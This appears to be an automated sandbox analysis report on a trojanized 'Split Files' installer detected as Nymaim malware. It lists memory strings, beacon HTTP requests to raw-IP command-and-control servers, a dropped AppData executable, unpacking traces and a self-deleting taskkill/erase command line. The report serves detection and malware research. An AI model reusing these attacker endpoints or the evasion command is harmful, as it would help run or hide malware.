                Source: SplitFiles131.exe, 00000002.00000002.337920488.000000000175A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-61K5M.tmp.1.dr, is-3OLEK.tmp.1.drString found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-7HLEL.tmp.1.dr, is-B5MB3.tmp.1.dr, is-E35J6.tmp.1.dr, is-AFEG0.tmp.1.dr, is-CSEUG.tmp.1.dr, is-OOV97.tmp.1.dr, is-7R5M5.tmp.1.dr, is-2PF6K.tmp.1.dr, is-FNEKR.tmp.1.dr, is-7QVA3.tmp.1.drString found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339420924.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: SplitFiles131.exe, 00000002.00000002.337920488.000000000175A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3370000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3370000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00405F40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004150D3
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00415305
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004223A9
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00419510
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404840
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00426850
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00410A50
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042AB9A
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00421C88
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042ACBA
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00447D2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00428D39
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000F670
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000EC61
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_0131AE8D
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00408CA0 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00446194 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00445EC4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 0043477C appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00455D54 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00407988 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00455B64 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00451DE8 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: String function: 00405A9C appears 92 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00423C4C NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004126A0 NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                Source: is-6A80U.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-6A80U.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-6A80U.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-HBEMJ.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-HBEMJ.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-HBEMJ.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000000.00000002.342802204.0000000000417000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Split Files\is-HBEMJ.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                Source: SplitFiles131.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D724E70,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D724E70,
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SplitFiles131.exe&quot;)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@12/39@0/5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004547A0 GetModuleHandleA,6D295550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040B090 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split FilesJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: `a}{
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: MFE.
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 2094367 > 1048576

                Data Obfuscation

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack
                Detected unpacking (changes PE section rights)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406594 push 004065D1h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404229 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408BDC push 00408C0Fh; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040438C push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00409A20 push 00409A5Dh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040A107 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004785C8 push 00478673h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00410798 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004129F0 push 00412A53h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00450EB4 push 00450EE7h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx
